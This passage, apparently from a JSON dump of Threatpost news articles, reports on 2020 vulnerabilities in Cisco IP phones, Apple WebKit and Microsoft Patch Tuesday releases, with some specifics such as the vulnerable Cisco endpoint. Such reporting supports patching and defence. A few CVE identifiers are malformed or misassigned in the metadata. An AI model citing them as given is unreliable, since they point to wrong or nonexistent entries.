medium-sized businesses.\n\nAccording to Jacob Baines with Tenable, [who discovered the flaw](<https://www.tenable.com/security/research/tra-2020-24>), Cisco IP phone web servers lack proper input validation for HTTP requests. To exploit the bug, an attacker could merely send a crafted HTTP request to the /deviceconfig/setActivationCode endpoint (on the web server of the targeted device).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThis triggers a stack-based buffer overflow due to the lack of input validation: \u201cIn libHTTPService.so, the parameters after /deviceconfig/setActivationCode are used to create a new URI via a sprintf function call. The length of the parameter string is not checked,\u201d according to Baines.\n\nThe end result is the attacker being able to crash the device, or even potentially execute code remotely.\n\nAffected products include: IP Phone 7811, 7821, 7841, and 7861 Desktop Phones; IP Phone 8811, 8841, 8845, 8851, 8861, and 8865 Desktop Phones; Unified IP Conference Phone 8831 and Wireless IP Phone 8821 and 8821-EX.\n\nOf note, according to Cisco, [some of these products](<https://www.cisco.com/c/en/us/products/collaboration-endpoints/wireless-ip-phone-8821/index.html>) (particularly the Wireless IP Phone 8821 and 8821-EX) are utilized by the healthcare industry who are currently on the frontlines of the [coronavirus pandemic.](<https://threatpost.com/cyberattacks-healthcare-orgs-coronavirus-frontlines/154768/>)\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/04/16132716/cisco-critical-flaw-1.png>)\n\nCisco has also confirmed various products that aren\u2019t affected by the flaw[ on its website.](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-voip-phones-rce-dos-rB6EeRXs>) Beyond Cisco\u2019s patches, one mitigation for the flaw is disabling web access on the IP phones (in fact, web access is disabled by default on IP phones), according to Cisco.\n\nNew findings by Tenable\u2019s Baines also led Cisco to bump up the severity of a previously-discovered vulnerability (CVE-2016-1421) in its IP phones to critical on Wednesday. Previously the flaw was medium-severity ([ranking 5 out of 10](<https://www.cvedetails.com/cve/CVE-2016-1421/>) on the CVSS scale).\n\nHowever, Baines found that the flaw could be exploited by an unauthenticated actor (previously Cisco said exploiting the flaw required authentication) and could potentially enable remote code execution as well as DoS (previously Cisco found it could only enable DoS). Baines also found a produce, the Wireless IP Phone 8821, to be vulnerable that wasn\u2019t listed on the affected list.\n\n**Other Critical Flaws**\n\nCisco [Wednesday also addressed](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ucsd-mult-vulns-UNfpdW4E>) critical- and high-severity flaws tied to nine CVEs in its Cisco Unified Computing System (UCS) Director and Cisco UCS Director Express for Big Data. Cisco UCS Director is an end-to-end management platform for various Cisco and non-Cisco data infrastructure components. Cisco UCS Director Express for Big Data is an open private-cloud platform that delivers Big-Data-as-a-Service on premises.\n\nThe flaws (CVE-2020-3239, CVE-2020-3240, CVE-2020-3243, CVE-2020-3247, CVE-2020-3248, CVE-2020-3249, CVE-2020-3250, CVE-2020-3251, CVE-2020-3252) exist in the REST API for both products, and may allow a remote attacker to bypass authentication or conduct directory traversal attacks on an affected device. Below is a list of affected products and the fixed releases.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/04/16132738/cisco-critical-flaw-2.png>)\n\nSteven Seeley of Source Incite, working with Trend Micro\u2019s Zero Day Initiative, was credited with reporting the flaws.\n\n\u201cThe Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerabilities that are described in this advisory,\u201d according to Cisco.\n\n**_Worried about your cloud security in the work-from-home era? On _****_April 23 at 2 p.m. ET_****_, join DivvyCloud and Threatpost for a FREE webinar, _**[**_A Practical Guide to Securing the Cloud in the Face of Crisis_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)**_. Get exclusive research insights and critical, advanced takeaways on how to avoid cloud disruption and chaos in the face of COVID-19 \u2013 and during all times of crisis. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_** for this sponsored webinar.**_\n", "cvss3": {}, "published": "2020-04-16T18:49:27", "type": "threatpost", "title": "Cisco IP Phone Harbors Critical RCE Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-1421", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-3161", "CVE-2020-3239", "CVE-2020-3240", "CVE-2020-3243", "CVE-2020-3247", "CVE-2020-3248", "CVE-2020-3249", "CVE-2020-3250", "CVE-2020-3251", "CVE-2020-3252", "CVE-2020-5135"], "modified": "2020-04-16T18:49:27", "id": "THREATPOST:F2B495A97075920EEF1C7328AE80CC7B", "href": "https://threatpost.com/critical-cisco-ip-phone-rce-flaw/154864/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:27:01", "description": "Apple has released a slew of patches across its iOS and macOS operating systems, Safari browser, watchOS, tvOS and iTunes. The most serious flaw in this latest security update, [released Tuesday](<https://www.us-cert.gov/ncas/current-activity/2020/03/25/apple-releases-security-updates>), exists in the WebKit and could enable remote code execution.\n\nOf the CVEs disclosed, 30 affected Apple\u2019s iOS, 11 impacted Safari and 27 affected macOS. Users for their part are urged to update to iOS 13.4, Safari 13.1 and macOS Catalina 10.15.3. While Apple typically is initially tight lipped when it comes to vulnerability details in security updates, it did outline eight flaws that were fixed in Apple\u2019s WebKit browser engine, which could enable anything from cross-site scripting (XSS) attacks to remote code execution in iOS and Safari.\n\nThe most severe of these vulnerabilities is a type confusion bug (CVE-2020-3897) in WebKit. Type confusion flaws are caused when a piece of code doesn\u2019t verify the type of object that is passed to it, and uses it blindly without type-checking. This specific flaw could be abused by a remote attacker \u2013 but user interaction is required to exploit the vulnerability in that the target must visit a malicious page or open a malicious file.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis vulnerability allows remote attackers to execute arbitrary code on affected installations of Apple Safari,\u201d Dustin Childs, manager with Zero Day Initiative, told Threatpost. \u201cThe specific flaw exists within the object transition cache. By performing actions in JavaScript, an attacker can trigger a type confusion condition. An attacker can leverage this vulnerability to execute code in the context of the current process.\u201d\n\nThe issue \u201cwas addressed with improved memory handling,\u201d according to Apple.\n\nAnother type confusion issue (CVE-2020-3901) was found in WebKit, that could lead to arbitrary code execution. This flaw could be exploited if an attacker persuades a victim to process maliciously crafted web content, according to Apple. Apple also addressed a memory corruption issue (CVE-2020-3895, CVE-2020-3900), and a memory consumption issue (CVE-2020-3899) that could could enable attackers to launch code execution attacks.\n\nFinally, the tech giant also fixed an input validation bug in WebKit (CVE-2020-3902) that could allow attackers to launch a cross-site scripting attack. The attackers would need to first persuade victims to process maliciously crafted web content.\n\nAffected are iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation; as well as macOS Mojave and macOS High Sierra, and included in macOS Catalina.\n\n**Other Flaws**\n\nApple also disclosed two kernel vulnerabilities affecting iOS and macOS. The first was a memory initialization issue (CVE-2020-3914) that could allow an application to read restricted memory; the second was memory corruption issues (CVE-2020-9785) in the kernel potentially allowing a malicious application to execute arbitrary code with kernel privileges.\n\nOther iOS vulnerabilities of note include a Bluetooth flaw (CVE-2020-97700), stemming from a logic issue, that could enable an attacker \u201cin a privileged network position\u201d intercept Bluetooth traffic; a use after free issue (CVE-2020-9768) in the iOS image processing tool that could allow an application to execute arbitrary code with system privileges; and, a logic issue (CVE-2020-3891) in the Messages app that could allow a person with physical access to a locked iOS device to respond to messages \u2013 even when replies are disabled.\n\nNotable macOS flaws that were addressed include a logic issue in FaceTime (CVE-2020-3881) that could allow a local user to view sensitive user information; an information disclosure issue stemming from the Intel graphics driver (CVE-2019-14615) that could allow a malicious application to disclose restricted memory.\n\nFinally, a logic issue was fixed in TCC, or the privacy protection system in macOS, (CVE-2020-3906) that could allow maliciously crafted applications to bypass code signing enforcement. According to Patrick Wardle, principal security researcher with Jamf, who discovered this flaw, the vulnerability means \u201ca local unprivileged attacker or malware could generate synthetic clicks, allowing the majority of security and privacy prompts to be bypassed.\u201d\n\n\u201cThis bug could be abused as part of a multi-stage attack, stage 0 would be to infect the system, stage 1 would then be do things like access the user\u2019s location, access the mic/webcam, modify system preferences, etc.,\u201d he told Threatpost.\n\nOn a related note, Apple also this week [said that it Safari browser](<https://threatpost.com/apple-safari-blocks-cookies-ad-targeting/154124/>) now blocks third-party cookies, alongside some changes to Apple\u2019s Intelligent Tracking Prevention (ITP) in iOS and iPadOS 13.4.[](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)_**Do you suffer from Password Fatigue? On [Wednesday April 8 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) join **_**_Duo Security and Threatpost as we explore a [passwordless](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) future. This [FREE](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) webinar maps out a future where modern authentication standards like WebAuthn significantly reduce a dependency on passwords. We\u2019ll also explore how teaming with Microsoft can reduced reliance on passwords. [Please register here](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) and dare to ask, \u201c[Are passwords overrated?](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\u201d in this sponsored webinar. _**\n", "cvss3": {}, "published": "2020-03-25T21:07:25", "type": "threatpost", "title": "Apple Update Fixes WebKit Flaws in iOS, Safari", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-14615", "CVE-2020-3881", "CVE-2020-3891", "CVE-2020-3895", "CVE-2020-3897", "CVE-2020-3899", "CVE-2020-3900", "CVE-2020-3901", "CVE-2020-3902", "CVE-2020-3906", "CVE-2020-3914", "CVE-2020-5135", "CVE-2020-9768", "CVE-2020-97700", "CVE-2020-9785"], "modified": "2020-03-25T21:07:25", "id": "THREATPOST:3F81254E133ABD9AE724F95349C0040A", "href": "https://threatpost.com/apple-update-fixes-webkit-flaws-in-ios-safari/154155/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:25:16", "description": "Microsoft has released fixes for 111 security vulnerabilities in its May Patch Tuesday update, including 16 critical bugs and 96 that are rated important.\n\nUnlike other [recent monthly updates](<https://threatpost.com/april-patch-tuesday-microsoft-active-exploit/154794/>) from the computing giant this year, none of the flaws are publicly known or under active attack at the time of release.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAlong with the expected cache of operating system, browser, Office and SharePoint updates, Microsoft has also released updates for .NET Framework, .NET Core, Visual Studio, Power BI, Windows Defender, and Microsoft Dynamics.\n\n## **Privilege-Escalation Bugs to the Fore**\n\nThe majority of the fixes are important-rated elevation-of-privilege (EoP) bugs. There are a total of 56 of these types of fixes in Microsoft\u2019s May release, primarily impacting various Windows components. This class of vulnerabilities is used by attackers once they\u2019ve managed to gain initial access to a system, in order to execute code on their target systems with elevated privileges.\n\nThree of these bugs have received a rating of \u201cExploitation More Likely,\u201d pointed out Satnam Narang, staff research engineer at Tenable: A pair of flaws in Win32k ([CVE-2020-1054](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1054>), [CVE-2020-1143](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1143>)) and one in the Windows Graphics Component ([CVE-2020-1135](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1135>)).\n\nThe two flaws in Win32k both exist when the Windows kernel-mode driver fails to properly handle objects in memory, according to Microsoft\u2019s advisory. An attacker who successfully exploited either vulnerability could run arbitrary code in kernel mode; thus, an attacker could then install programs; view, change or delete data; or create new accounts with full user rights.\n\nTo exploit these, an attacker would first have to log on to the system. An attacker could then run a specially crafted application that could exploit the vulnerability and take control of an affected system.\n\nThe Windows Graphics Component EoP bug meanwhile is found in most Windows 10 and Windows Server builds, Jay Goodman, strategic product marketing manager at Automox, told Threatpost. \u201cThe vulnerability could allow an exploit that leverages how Windows Graphics handles objects in memory,\u201d he said. \u201cAn attacker could use this vulnerability to elevate a process\u2019 privileges, allowing the attacker to steal credentials or sensitive data, download additional malware, or execute malicious code.\u201d\n\nIt was demonstrated at this year\u2019s Pwn2Own, said Dustin Childs, researcher at Trend Micro\u2019s Zero-Day Initiative.\n\n\u201cWhile Pwn2Own [may have been virtual](<https://threatpost.com/defying-covid-19s-pall-pwn2own-goes-virtual/154002/>) this year, the bugs demonstrated certainly were not,\u201d he said in a [Patch Tuesday analysis](<https://www.zerodayinitiative.com/blog/2020/5/12/the-may-2020-security-update-review>). \u201cThis bug from the Fluoroacetate duo of Richard Zhu and Amat Cama allows a logged-on user to take over a system by running a specially crafted program. They leveraged a use-after-free (UAF) bug in Windows to escalate from a regular user to SYSTEM.\u201d\n\nThere is also one critical EoP bug, in Microsoft Edge ([CVE-2020-1056](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1056>)). This exists because Edge does not properly enforce cross-domain policies, which could allow an attacker to access information from one domain and inject it into another domain, according to Microsoft\u2019s advisory. However, in all cases an attack requires user interaction, such as tricking users into clicking a link that takes them to the attacker\u2019s site.\n\n\u201cIn a web-based attack scenario, an attacker could host a website that is used to attempt to exploit the vulnerability,\u201d it said. \u201cIn addition, compromised websites and websites that accept or host user-provided content could contain specially crafted content that could exploit the vulnerability.\u201d\n\n## **Critical Patches to Consider**\n\nOther bugs of note include two remote code execution (RCE) flaws in Microsoft Color Management ([CVE-2020-1117](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1117>)) and Windows Media Foundation ([CVE-2020-1126](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1126>)), which could both be exploited by tricking a user via social engineering techniques into opening a malicious email attachment or visiting a website that contains the exploit code.\n\n\u201cSuccessful exploitation would allow an attacker to perform actions on the system using the same permissions as the current user that was compromised,\u201d said Tenable\u2019s Narang. \u201cIf the user has administrative privileges, the attacker could then perform a variety of actions, such as installing programs, creating a new account with full user rights, and viewing, changing or deleting data.\u201d\n\nThe critical flaws also include updates for Chakra Core, Internet Explorer and EdgeHTML, while SharePoint has four critical bugs, continuing its dominance in that category from last month.\n\n\u201cMost of the critical vulnerabilities are resolved by the OS and browser updates, but there are four critical vulnerabilities in SharePoint and one in Visual Studio,\u201d Todd Schell, senior product manager, security, for Ivanti said via email.\n\nOn the SharePoint front, [CVE-2020-1023](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1023>) and [CVE-2020-1102](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1102>) are critical RCE vulnerabilities that would allow attackers to access a system and read or delete contents, make changes, or directly run code on the system.\n\n\u201cThis gives an attacker quick and easy access to not only your organization\u2019s most critical data stored in the SQL server but also a platform to perform additional malicious attacks against other devices in your environment,\u201d Automox\u2019 Goodman told Threatpost. \u201cSystems like SharePoint can often be difficult to take offline and patch, allowing RCE vulnerabilities to linger in your infrastructure. This gives attackers the ability to \u2018live off the land\u2019 and move laterally easily once access is gained via an existing exploit.\n\nAlso in SharePoint, an exploit for [CVE-202-1024](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1024>) would give an attacker the ability to execute arbitrary code from the SharePoint application pool and the SharePoint server farm account, potentially impacting all the users connected into and using the platform.\n\n\u201cIf an attacker is able to access this critical component of the network, lateral movement throughout the connected filesystems would be difficult to contain,\u201d said Richard Melick, Sr., technical product manager at Automox, via email. \u201cWith Microsoft SharePoint\u2019s rise in use to support remote workers, addressing this vulnerability quickly is critical to securing a central hub of access to the full corporate network and data.\u201d\n\nAs for Visual Studio, \u201cusers of the Visual Studio Code Python Extension should take note of the two patches released this month,\u201d Childs noted, which are both RCE issues. \u201cOne is rated critical [[CVE-2020-1192](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1192>)] while the other is rated important [[CVE-2020-1171](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1171>)]. There\u2019s no indication as to why one is more severe than the other, and users should treat them both as critical.\u201d\n\n## **Other Bugs of Note**\n\nAdministrators should also pay attention to a handful of other issues in the trove of patches, such as two for VBScript ([CVE-2020-1060](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1060>) and [CVE-2020-1058](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1058>)).\n\nWhen exploited, both could allow an attacker to gain the same right as the current user.\n\n\u201cWhile both CVE-2020-1058 and CVE-2020-1060 are not rated critical in severity, it\u2019s very possible to see them used by attackers in the wild; both vulnerabilities impact VBScript and how the scripting engine handles objects in memory,\u201d Chris Hass, director of information security and research for Automox, told Threatpost. \u201cDue to the versatility of VBScript in Windows, these vulnerabilities allow for several attack vectors to be explored by malicious actors.\u201d\n\nFor instance, an attacker could host a malicious webpage with a specially crafted payload to exploit any user visiting the page using Internet Explorer, inject code into a compromised webpage, or even launch a malvertising campaign to serve the payload via malicious advertisements on popular websites, he said.\n\nHe added, \u201cAn attacker could also embed an Active X control object in an application or Office document that could be used in a phishing campaign to gain code execution on the machine. It\u2019s likely only a matter of time till attackers, such as DarkHotel, incorporate these into their arsenal.\u201d DarkHotel [has been known to use VBScript bugs](<https://threatpost.com/darkhotel-exploits-microsoft-zero-day-vbscript-flaw/136685/>) in the past.\n\nThere\u2019s also an interesting denial-of-service vulnerability ([CVE-2020-1118](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1118>)) in Microsoft Windows Transport Layer Security. It allows a remote, unauthenticated attacker to abnormally reboot, resulting in a denial-of-service condition.\n\n\u201cA NULL pointer dereference vulnerability exists in the Windows implementation of the Diffie-Hellman protocol,\u201d explained Childs. \u201cAn attacker can exploit this vulnerability by sending a malicious Client Key Exchange message during a TLS handshake. The vulnerability affects both TLS clients and TLS servers, so just about any system could be shut down by an attacker. Either way, successful exploitation will cause the lsass.exe process to terminate.\u201d\n\nIn terms of patching prioritization, \u201cWhat is interesting and often overlooked is seven of the 10 CVEs at higher risk of exploit are only rated as important,\u201d Ivanti\u2019s Schell said. \u201cIt is not uncommon to look to the critical vulnerabilities as the most concerning, but many of the vulnerabilities that end up being exploited are rated as important vs. critical. If your prioritization stops at vendor severity or even CVSS scores above a certain level, you may want to reassess your metrics. Look to other risk metrics like publicly disclosed, exploited (obviously) and exploitability assessment (Microsoft specific) to expand your prioritization process.\u201d\n\nMelick added that the critical bug in Visual Studio Code, which stems from how the Python extension loads workspace settings from a notebook file, should be a top priority, given that it\u2019s one of the most popular developer environment tools.\n\n\u201cAccounting for over 50 percent of the market share of developer tools, an attacker is not short of potential targets, and if successful, would have the ability to take control of the victim machine acting as the current user,\u201d he said. \u201cOnce an attacker has gained access, they could be capable of stealing critical information like source codes, inserting malicious code or backdoors into current projects, and install, modify or delete data. Due to the importance and popularity of Visual Studio Code, it is critical that organizations deploy this patch within 24 hours before this vulnerability is weaponized and deployed.\u201d\n\nMicrosoft has been on a bug-fixing roll lately; this month marks three months in a row that Microsoft has released patches for more than 110 CVEs.\n\n\u201cWe\u2019ll see if they maintain that pace throughout the year,\u201d said Childs.\n\n**_Inbox security is your best defense against today\u2019s fastest growing security threat \u2013 phishing and Business Email Compromise attacks. _**[**_On May 13 at 2 p.m. ET_**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_, join Valimail security experts and Threatpost for a FREE webinar, _**[**_5 Proven Strategies to Prevent Email Compromise_**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_. Get exclusive insights and advanced takeaways on how to lockdown your inbox to fend off the latest phishing and BEC assaults. Please _**[**_register here _**](<https://register.gotowebinar.com/register/5064791868226032141?source=ART>)**_for this sponsored webinar._**\n\n_**Also, don\u2019t miss our latest on-demand webinar from DivvyCloud and Threatpost, **_[_**A Practical Guide to Securing the Cloud in the Face of Crisis**_](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_**, with critical, advanced takeaways on how to avoid cloud disruption and chaos.**_\n", "cvss3": {}, "published": "2020-05-12T20:14:28", "type": "threatpost", "title": "Microsoft Addresses 111 Bugs for May Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1023", "CVE-2020-1024", "CVE-2020-1054", "CVE-2020-1056", "CVE-2020-1058", "CVE-2020-1060", "CVE-2020-1102", "CVE-2020-1117", "CVE-2020-1118", "CVE-2020-1126", "CVE-2020-1135", "CVE-2020-1143", "CVE-2020-1171", "CVE-2020-1192", "CVE-2020-5135"], "modified": "2020-05-12T20:14:28", "id": "THREATPOST:D3F7F2434B9347169B642A60BEC9FF02", "href": "https://threatpost.com/microsoft-111-bugs-may-patch-tuesday/155669/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T20:43:08", "description": "Microsoft has pushed out fixes for 87 security vulnerabilities in October \u2013 11 of them critical \u2013 and one of those is potentially wormable.\n\nThere are also six bugs that were previously unpatched but publicly disclosed, which could give cybercriminals a leg up \u2014 and in fact at least one public exploit is already circulating for this group.\n\nThis month\u2019s Patch Tuesday overall includes fixes for bugs in Microsoft Windows, Office and Office Services and Web Apps, Azure Functions, Open Source Software, Exchange Server, Visual Studio, .NET Framework, Microsoft Dynamics, and the Windows Codecs Library.\n\nA full 75 are listed as important, and just one is listed as moderate in severity. None are listed as being under active attack, but the group does include six issues that were known but unpatched before this month\u2019s regularly scheduled updates.\n\n\u201cAs usual, whenever possible, it\u2019s better to prioritize updates against the Windows operating system,\u201d Richard Tsang, senior software engineer at Rapid7, told Threatpost. \u201cComing in at 53 of the 87 vulnerabilities, patching the OS knocks out 60 percent of the vulnerabilities listed, along with over half of the critical RCE vulnerabilities resolved today.\u201d\n\n## **11 Critical Bugs**\n\nOne of the most notable critical bugs, according to researchers, is a remote code-execution (RCE) problem in the TCP/IP stack. That issue ([CVE-2020-16898](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898>)) allows attackers to execute arbitrary code with elevated privileges using a specially crafted ICMPv6 router advertisement.\n\nMicrosoft gives this bug its highest exploitability rating, meaning attacks in the wild are extremely likely \u2013 and as such, it carries a severity rating of 9.8 out of 10 on the CvSS vulnerability scale. True to the season, it could be an administrator\u2019s horror show.\n\n\u201cIf you\u2019re running an IPv6 network, you know that filtering router advertisements is not a practical workaround,\u201d said Dustin Childs, researcher at Trend Micro\u2019s Zero-Day Initiative (ZDI), in his [Patch Tuesday analysis](<https://www.thezdi.com/blog/2020/10/13/the-october-2020-security-update-review>). \u201cYou should definitely test and deploy this patch as soon as possible.\u201d\n\n[](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\n\nClick to Register!\n\nBharat Jogi, senior manager of vulnerability and threat research at Qualys, said that an exploit for the bug could be self-propagating, worming through infrastructure without user interaction.\n\n\u201cAn attacker can exploit this vulnerability without any authentication, and it is potentially wormable,\u201d he said. \u201cWe expect a proof-of-concept (PoC) for this exploit would be dropped soon, and we highly encourage everyone to fix this vulnerability as soon as possible.\u201d\n\nThreatpost has reached out for more technical details on the wormable aspect of the bug.\n\n\u201cLuckily, if immediate patching isn\u2019t viable due to reboot scheduling, Microsoft provides [PowerShell-based commands](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-16898#ID0EUGAC>) to disable ICMPv6 RDNSS on affected operating systems,\u201d said Tsang. \u201cThe PowerShell command `netsh int ipv6 set int *INTERFACENUMBER* rabaseddnsconfig=disable` does not require a reboot to take effect.\u201d\n\nAnother of the critical flaws is an RCE bug in Microsoft Outlook ([CVE-2020-16947](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16947>)). The bug can be triggered by sending a specially crafted email to a target; and because the Preview Pane is an attack vector, victims don\u2019t need to open the mail to be infected (ZDI already has a proof-of-concept for this). It can also be used in a web-based attack by convincing users to visit a malicious URL hosting triggering content.\n\n\u201cThe specific flaw exists within the parsing of HTML content in an email. The issue results from the lack of proper validation of the length of user-supplied data before copying it to a fixed-length heap-based buffer,\u201d according to Childs. That bug is rated 8.1 on the CvSS scale.\n\nA critical Windows Hyper-V RCE bug ([CVE-2020-16891](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16891>), 8.8 on the CvSS scale) meanwhile allows an attacker to run a specially crafted program on an affected guest OS to execute arbitrary code on the host OS.\n\nAnd, other critical problems impact the Windows Camera Codec ([CVE-2020-16967](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16967>) and [CVE-2020-16968](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16968>), both 7.8 on the CvSS scale), both resulting from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer.\n\n\u201cIf the current user is logged on with administrative user rights, an attacker could take control of the affected system,\u201d according to Microsoft. \u201cAn attacker could then install programs; view, change or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\u201d\n\nTwo other critical flaws are RCE problems in SharePoint Server ([CVE-2020-16951](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16951>) and [CVE-2020-16952](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952>), both 8.6 on the CvSS scale). They exploit a gap in checking the source markup of an application package. Upon successful exploitation, the attacker could run arbitrary code in the context of the SharePoint application pool or server farm account.\n\n\u201cIn both cases, the attacker would need to upload a specially crafted SharePoint application package to an affected version of SharePoint to get arbitrary code execution,\u201d explained Childs. \u201cThis can be accomplished by an unprivileged SharePoint user if the server\u2019s configuration allows it.\u201d\n\nTsang added that PoCs are \u201cstarting to flow out in the wild, so bringing a closure to this pair of critical remote code execution vulnerabilities is a must.\u201d\n\nThe remaining critical bugs are RCE issues in Media Foundation Library ([CVE-2020-16915](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16915>), rating 7.8); the Base3D rendering engine ([CVE-2020-17003](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17003>), rating 7.8); Graphics components ([CVE-2020-16923](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16923>), rating 7.8); and the Windows Graphics Device Interface (GDI) ([CVE-2020-16911](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16911>), rating 8.8).\n\nRegarding the latter, the vulnerability exists in the way GDI handles objects in memory, according to Allan Liska, senior security architect at Recorded Future.\n\n\u201cSuccessful exploitation could allow an attacker to gain control of the infected system with the same administrative privileges as the victim,\u201d he said, via email. \u201cThis vulnerability could be exploited by either tricking a victim into visiting a compromised website with a specially crafted document or opening a specially crafted document via a phishing attack.\u201d\n\nTsang added, \u201cA mitigating factor here is that users with fewer privileges on the system could be less impacted, but still emphasizes the importance of good security hygiene as exploitation requires convincing a user to open a specially-crafted file or to view attacker-controlled content. Unlike CVE-2020-16898, however, this vulnerability affects all supported versions of Windows OS, which may suggest affecting unsupported/earlier versions of Windows as well.\u201d\n\n## **6 Publicly Known Bugs**\n\nThere are also a half-dozen vulnerabilities that have been unpatched until this month, but which were publicly known.\n\n\u201cPublic disclosure could mean a couple things,\u201d Todd Schell, senior product manager of security at Ivanti told Threatpost. \u201cIt could be that a demonstration of exploit was performed at an event or by a researcher. It could also mean that a PoC code has been made available.\u201d\n\nWhen it comes to these publicly known bugs, a Windows Error Reporting (WER) elevation-of-privilege issue (CVE-2020-16909) stands out, according to Childs, given that bugs in the WER component [were recently reported as being used in the wild](<https://threatpost.com/apt-attack-malware-windows-error-reporting/159861/>) in fileless attacks.\n\n\n\nThe six publicly disclosed bugs. Source: Trend Micro\u2019s ZDI.\n\nAs for the others, two of are EoP bugs, in the Windows Setup component and the Windows Storage VSP Driver; two are information-disclosure problems in the kernel; and one is an information-disclosure issue in .NET Framework.\n\n\u201cThese info-disclosure bugs leak the contents of kernel memory but do not expose any personally identifiable information,\u201d Childs said.\n\nOne of the info-disclosure bugs, [CVE-2020-16938](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16938>), now has a PoC exploit that was [dropped on Twitter](<https://twitter.com/jonasLyk/status/1316104870987010048>) on Tuesday, by @jonasLyk. He claimed that a \u201crecent update changed the permissions on partitions and volume device objects, granting everybody read access. This means that by opening the device directly you can read the raw data without any [privileges].\u201d\n\nWith exploits emerging already, Schell pointed out that \u201ca public disclosure does mean that threat actors have advanced warning of a vulnerability and this gives them an advantage.\u201d In fact, the [mean time to exploit a vulnerability from the moment of its disclosure is 22 days](<https://www.rand.org/content/dam/rand/pubs/research_reports/RR1700/RR1751/RAND_RR1751.pdf>), according to a research study from the RAND Institute.\n\nOverall, the lighter patch load of 87 fixes is a significant departure from the 110+ patches the software giant has released every month since March.\n\n\u201cSecurity teams are still reeling from efforts around reducing exposure to CVE-2020-1472 (Zerologon), and today\u2019s Patch Tuesday thankfully brings a slightly lightened load of vulnerabilities compared to the previous seven months, with no vulnerabilities currently known to be exploited in the wild,\u201d Jonathan Cran, head of research at Kenna Security, told Threatpost. \u201cThat said, several of the vulnerabilities in today\u2019s update should be treated with a priority due to their usefulness to attackers [the critical bugs in the Win10 IPv6 stack, Outlook and Hyper-V]. These vulnerabilities all fall into the \u2018patch quickly or monitor closely\u2019 bucket.\n\nAlso, some products were notably absent from the fixes list.\n\n\u201cThere are a couple of interesting things this month,\u201d Schell told Threatpost. \u201cThere are no browser vulnerabilities being resolved. At the time of release, Microsoft did not have any CVEs reported against IE or Edge and no listing of the browsers as affected products this month. Not sure I remember the last time that has happened.\u201d\n\nPatch Tuesday rolls out this month as Microsoft launches the preview of [its new update guide](<https://threatpost.com/microsoft-overhauls-security-update-guide/159449/>).\n\n\u201cIt has provided a few nice improvements,\u201d Schell said. \u201cQuick access to more of the risk-focused information can be found in [the vulnerabilities 